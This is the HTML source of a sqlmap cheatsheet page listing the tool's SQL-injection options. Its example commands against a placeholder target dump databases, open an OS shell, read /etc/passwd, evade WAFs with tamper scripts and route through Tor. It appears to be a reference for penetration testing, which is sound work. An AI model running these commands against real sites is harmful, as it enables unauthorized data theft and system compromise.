346 lines
10 KiB
HTML
346 lines
10 KiB
HTML
<!DOCTYPE html>
|
|
<html lang="en">
|
|
<head>
|
|
<meta charset="UTF-8">
|
|
<meta name="viewport" content="width=device-width, initial-scale=1.0">
|
|
<meta http-equiv="Content-Security-Policy" content="default-src 'self'; script-src 'self'; style-src 'self'; font-src 'self' data:; img-src 'self' data:; connect-src 'self'; base-uri 'self'; form-action 'self' https://defcon.social https://bsky.app;">
|
|
<meta http-equiv="X-Content-Type-Options" content="nosniff">
|
|
<link rel="stylesheet" href="../assets/css/style.css">
|
|
<link rel="icon" type="image/x-icon" href="../favicon.ico">
|
|
<script>
|
|
(function() {
|
|
const theme = localStorage.getItem('theme') ||
|
|
(window.matchMedia && window.matchMedia('(prefers-color-scheme: dark)').matches ? 'dark' : 'light');
|
|
document.documentElement.setAttribute('data-theme', theme);
|
|
})();
|
|
</script>
|
|
<title>sqlmap Cheatsheet - Cheatsheets - Launch Pad</title>
|
|
</head>
|
|
<body>
|
|
<button class="theme-toggle" id="themeToggle" aria-label="Toggle dark mode">
|
|
<svg class="theme-icon theme-icon-moon" xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path d="M21 12.79A9 9 0 1 1 11.21 3 7 7 0 0 0 21 12.79z"></path></svg>
|
|
<svg class="theme-icon theme-icon-sun" xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" style="display: none;"><circle cx="12" cy="12" r="5"></circle><line x1="12" y1="1" x2="12" y2="3"></line><line x1="12" y1="21" x2="12" y2="23"></line><line x1="4.22" y1="4.22" x2="5.64" y2="5.64"></line><line x1="18.36" y1="18.36" x2="19.78" y2="19.78"></line><line x1="1" y1="12" x2="3" y2="12"></line><line x1="21" y1="12" x2="23" y2="12"></line><line x1="4.22" y1="19.78" x2="5.64" y2="18.36"></line><line x1="18.36" y1="5.64" x2="19.78" y2="4.22"></line></svg>
|
|
</button>
|
|
<br/><br/>
|
|
<div class="name">
|
|
__ _______________________ _________._________________________
|
|
\_ _____/ \______ \ / _ \ / _____/ / _____/ | | \_ _____/
|
|
| __) | _/ / /_\ \ / \ ___ / \ ___ | | | __)_
|
|
| \ | | \ / | \ \ \_\ \ \ \_\ \ | |___ | \
|
|
\___ / |____|_ / \____|__ / \______ / \______ / |_______ \ /_______ /
|
|
\/ \/ \/ \/ \/ \/ \/
|
|
</div>
|
|
<div class="blog-page-header">
|
|
<div class="blog-header-content">
|
|
<a href="/cheatsheets" class="back-link" title="Back to Cheatsheets">
|
|
<svg xmlns="http://www.w3.org/2000/svg" width="42" height="42" viewBox="0 0 24 24" class="home-icon"><path fill="currentColor" d="M10 20v-6h4v6h5v-8h3L12 3 2 12h3v8z"/></svg>
|
|
</a>
|
|
<h1 class="blog-page-title">sqlmap Cheatsheet</h1>
|
|
</div>
|
|
</div>
|
|
<div class="blog-post-container">
|
|
<div class="blog-posts-container" style="max-width: 900px; margin: 0 auto;">
|
|
<div class="blog-post">
|
|
<div class="blog-post-content">
|
|
<p><a href="index.html">← Back to cheatsheets</a></p>
|
|
<p><a href="../index.html">← Home</a></p>
|
|
<hr>
|
|
<p>sqlmap is an automated SQL injection testing and exploitation tool. It can detect and exploit SQL injection vulnerabilities in web applications, supporting multiple database management systems.</p>
|
|
<hr>
|
|
<h2>Basic Usage</h2>
|
|
<ul>
|
|
<li>sqlmap -u <url> - Test URL for SQL injection</li>
|
|
</ul>
|
|
<ul>
|
|
<li>sqlmap -u "http://target.com/page.php?id=1" - Test specific URL</li>
|
|
</ul>
|
|
<ul>
|
|
<li>sqlmap -u <url> --dbs - Enumerate databases</li>
|
|
</ul>
|
|
<ul>
|
|
<li>sqlmap -u <url> -D <database> --tables - Enumerate tables</li>
|
|
</ul>
|
|
<ul>
|
|
<li>sqlmap -u <url> -D <database> -T <table> --columns - Enumerate columns</li>
|
|
</ul>
|
|
<ul>
|
|
<li>sqlmap -u <url> -D <database> -T <table> --dump - Dump table data</li>
|
|
</ul>
|
|
<hr>
|
|
<h2>Target Options</h2>
|
|
<ul>
|
|
<li>-u <url> - Target URL</li>
|
|
</ul>
|
|
<ul>
|
|
<li>-l <file> - Target list from Burp log file</li>
|
|
</ul>
|
|
<ul>
|
|
<li>-x <url> - Sitemap URL (XML)</li>
|
|
</ul>
|
|
<ul>
|
|
<li>-m <file> - Multiple targets from file</li>
|
|
</ul>
|
|
<ul>
|
|
<li>-r <file> - HTTP request from file</li>
|
|
</ul>
|
|
<ul>
|
|
<li>-g <query> - Google dork query</li>
|
|
</ul>
|
|
<ul>
|
|
<li>-c <file> - Configuration file</li>
|
|
</ul>
|
|
<hr>
|
|
<h2>Request Options</h2>
|
|
<ul>
|
|
<li>--data=<data> - POST data string</li>
|
|
</ul>
|
|
<ul>
|
|
<li>--cookie=<cookie> - Cookie string</li>
|
|
</ul>
|
|
<ul>
|
|
<li>--headers=<headers> - HTTP headers</li>
|
|
</ul>
|
|
<ul>
|
|
<li>--user-agent=<ua> - User-Agent string</li>
|
|
</ul>
|
|
<ul>
|
|
<li>--referer=<referer> - Referer string</li>
|
|
</ul>
|
|
<ul>
|
|
<li>--proxy=<proxy> - Use HTTP proxy</li>
|
|
</ul>
|
|
<ul>
|
|
<li>--tor --tor-type=SOCKS5 --check-tor - Use Tor proxy</li>
|
|
</ul>
|
|
<ul>
|
|
<li>-H - Set custom HTTP header</li>
|
|
</ul>
|
|
<ul>
|
|
<li>--method=<method> - HTTP method (GET, POST, PUT, etc.)</li>
|
|
</ul>
|
|
<hr>
|
|
<h2>Parameter Options</h2>
|
|
<ul>
|
|
<li>-p <parameter> - Test specific parameter</li>
|
|
</ul>
|
|
<ul>
|
|
<li>--skip=<param> - Skip testing parameter</li>
|
|
</ul>
|
|
<ul>
|
|
<li>-r <file> - Load HTTP request from file (auto-detect parameters)</li>
|
|
</ul>
|
|
<ul>
|
|
<li>--param-del=<delimiter> - Parameter delimiter</li>
|
|
</ul>
|
|
<hr>
|
|
<h2>Enumeration Options</h2>
|
|
<ul>
|
|
<li>--dbs - Enumerate databases</li>
|
|
</ul>
|
|
<ul>
|
|
<li>--tables - Enumerate tables</li>
|
|
</ul>
|
|
<ul>
|
|
<li>--columns - Enumerate columns</li>
|
|
</ul>
|
|
<ul>
|
|
<li>--dump - Dump table entries</li>
|
|
</ul>
|
|
<ul>
|
|
<li>--dump-all - Dump all databases</li>
|
|
</ul>
|
|
<ul>
|
|
<li>-D <database> - Specify database</li>
|
|
</ul>
|
|
<ul>
|
|
<li>-T <table> - Specify table</li>
|
|
</ul>
|
|
<ul>
|
|
<li>-C <column> - Specify column</li>
|
|
</ul>
|
|
<ul>
|
|
<li>--schema - Enumerate database schema</li>
|
|
</ul>
|
|
<ul>
|
|
<li>--count - Count entries in table</li>
|
|
</ul>
|
|
<hr>
|
|
<h2>Database System Options</h2>
|
|
<ul>
|
|
<li>--dbms=<dbms> - Force database type (MySQL, PostgreSQL, MSSQL, Oracle, SQLite)</li>
|
|
</ul>
|
|
<ul>
|
|
<li>--dbms-cred=<user:pass> - Database credentials</li>
|
|
</ul>
|
|
<ul>
|
|
<li>--os=<os> - Force OS type</li>
|
|
</ul>
|
|
<ul>
|
|
<li>--tamper=<script> - Use tamper script</li>
|
|
</ul>
|
|
<hr>
|
|
<h2>File Operations</h2>
|
|
<ul>
|
|
<li>--file-read=<file> - Read file from database server</li>
|
|
</ul>
|
|
<ul>
|
|
<li>--file-write=<file> - Write local file to database server</li>
|
|
</ul>
|
|
<ul>
|
|
<li>--file-dest=<path> - Remote file path for write operations</li>
|
|
</ul>
|
|
<hr>
|
|
<h2>Shell Options</h2>
|
|
<ul>
|
|
<li>--sql-shell - Interactive SQL shell</li>
|
|
</ul>
|
|
<ul>
|
|
<li>--os-shell - Interactive OS shell</li>
|
|
</ul>
|
|
<ul>
|
|
<li>--os-cmd=<cmd> - Execute OS command</li>
|
|
</ul>
|
|
<ul>
|
|
<li>--os-pwn - Meterpreter shell</li>
|
|
</ul>
|
|
<ul>
|
|
<li>--os-smbrelay - SMB relay attack</li>
|
|
</ul>
|
|
<hr>
|
|
<h2>Detection Options</h2>
|
|
<ul>
|
|
<li>--level=<1-5> - Level of tests (1-5, default 1)</li>
|
|
</ul>
|
|
<ul>
|
|
<li>--risk=<1-3> - Risk of tests (1-3, default 1)</li>
|
|
</ul>
|
|
<ul>
|
|
<li>--technique=<technique> - Injection techniques (B, E, U, S, T, Q)</li>
|
|
</ul>
|
|
<ul>
|
|
<li>--time-sec=<sec> - Seconds to wait for response (default 5)</li>
|
|
</ul>
|
|
<ul>
|
|
<li>--union-cols=<range> - Column range for UNION tests</li>
|
|
</ul>
|
|
<hr>
|
|
<h2>Technique Options</h2>
|
|
<ul>
|
|
<li>B - Boolean-based blind</li>
|
|
</ul>
|
|
<ul>
|
|
<li>E - Error-based</li>
|
|
</ul>
|
|
<ul>
|
|
<li>U - Union query-based</li>
|
|
</ul>
|
|
<ul>
|
|
<li>S - Stacked queries</li>
|
|
</ul>
|
|
<ul>
|
|
<li>T - Time-based blind</li>
|
|
</ul>
|
|
<ul>
|
|
<li>Q - Inline queries</li>
|
|
</ul>
|
|
<hr>
|
|
<h2>Output Options</h2>
|
|
<ul>
|
|
<li>--batch - Never ask for user input (use defaults)</li>
|
|
</ul>
|
|
<ul>
|
|
<li>--verbose=<0-6> - Verbosity level</li>
|
|
</ul>
|
|
<ul>
|
|
<li>-v <level> - Verbosity level (0-6)</li>
|
|
</ul>
|
|
<ul>
|
|
<li>--output-dir=<dir> - Output directory</li>
|
|
</ul>
|
|
<hr>
|
|
<h2>Misc Options</h2>
|
|
<ul>
|
|
<li>--threads=<num> - Max concurrent HTTP requests (default 1)</li>
|
|
</ul>
|
|
<ul>
|
|
<li>--delay=<sec> - Delay between requests (seconds)</li>
|
|
</ul>
|
|
<ul>
|
|
<li>--timeout=<sec> - Request timeout (default 30)</li>
|
|
</ul>
|
|
<ul>
|
|
<li>--retries=<num> - Retries on timeout (default 3)</li>
|
|
</ul>
|
|
<ul>
|
|
<li>--ignore-code=<code> - Ignore HTTP error codes</li>
|
|
</ul>
|
|
<ul>
|
|
<li>--ignore-proxy - Ignore default proxy settings</li>
|
|
</ul>
|
|
<hr>
|
|
<h2>Common Examples</h2>
|
|
<h3>Basic Detection</h3>
|
|
<pre><code>sqlmap -u "http://target.com/page.php?id=1"</code></pre>
|
|
<h3>Enumerate Databases</h3>
|
|
<pre><code>sqlmap -u "http://target.com/page.php?id=1" --dbs</code></pre>
|
|
<h3>Enumerate Tables</h3>
|
|
<pre><code>sqlmap -u "http://target.com/page.php?id=1" -D database_name --tables</code></pre>
|
|
<h3>Dump Table</h3>
|
|
<pre><code>sqlmap -u "http://target.com/page.php?id=1" -D database_name -T table_name --dump</code></pre>
|
|
<h3>POST Request</h3>
|
|
<pre><code>sqlmap -u "http://target.com/login.php" --data="username=admin&password=test" -p username</code></pre>
|
|
<h3>From Burp Log</h3>
|
|
<pre><code>sqlmap -l burp_log.txt --batch</code></pre>
|
|
<h3>Cookie Injection</h3>
|
|
<pre><code>sqlmap -u "http://target.com/page.php" --cookie="session=abc123" --dbs</code></pre>
|
|
<h3>Get OS Shell</h3>
|
|
<pre><code>sqlmap -u "http://target.com/page.php?id=1" --os-shell</code></pre>
|
|
<h3>Read File</h3>
|
|
<pre><code>sqlmap -u "http://target.com/page.php?id=1" --file-read="/etc/passwd"</code></pre>
|
|
<h3>Use Tor</h3>
|
|
<pre><code>sqlmap -u "http://target.com/page.php?id=1" --tor --tor-type=SOCKS5 --check-tor</code></pre>
|
|
<hr>
|
|
<h2>Tips</h2>
|
|
<ul>
|
|
<li>Use --batch for automated testing (no user interaction)</li>
|
|
</ul>
|
|
<ul>
|
|
<li>Use -r with Burp log files for easy testing</li>
|
|
</ul>
|
|
<ul>
|
|
<li>Increase --level and --risk for more thorough testing</li>
|
|
</ul>
|
|
<ul>
|
|
<li>Use --threads for faster enumeration (be careful with server load)</li>
|
|
</ul>
|
|
<ul>
|
|
<li>Combine with Burp Suite for complex authentication scenarios</li>
|
|
</ul>
|
|
<ul>
|
|
<li>Use --tamper scripts to bypass WAFs and filters</li>
|
|
</ul>
|
|
<ul>
|
|
<li>Always test on authorized systems only</li>
|
|
</ul>
|
|
<ul>
|
|
<li>Use --proxy to monitor requests with Burp or similar tools</li>
|
|
</ul>
|
|
<ul>
|
|
<li>Check --check-tor before using Tor to verify connection</li>
|
|
</ul>
|
|
<ul>
|
|
<li>Use --batch to avoid prompts in automated scripts</li>
|
|
</ul>
|
|
<hr>
|
|
<p><a href="index.html">← Back to cheatsheets</a></p>
|
|
<p><a href="../index.html">← Home</a></p>
|
|
</div>
|
|
</div>
|
|
</div>
|
|
</div>
|
|
<script async type="text/javascript" src="../blog/analytics.js"></script>
|
|
<script src="../theme.js"></script>
|
|
</body>
|
|
</html>
|
|
|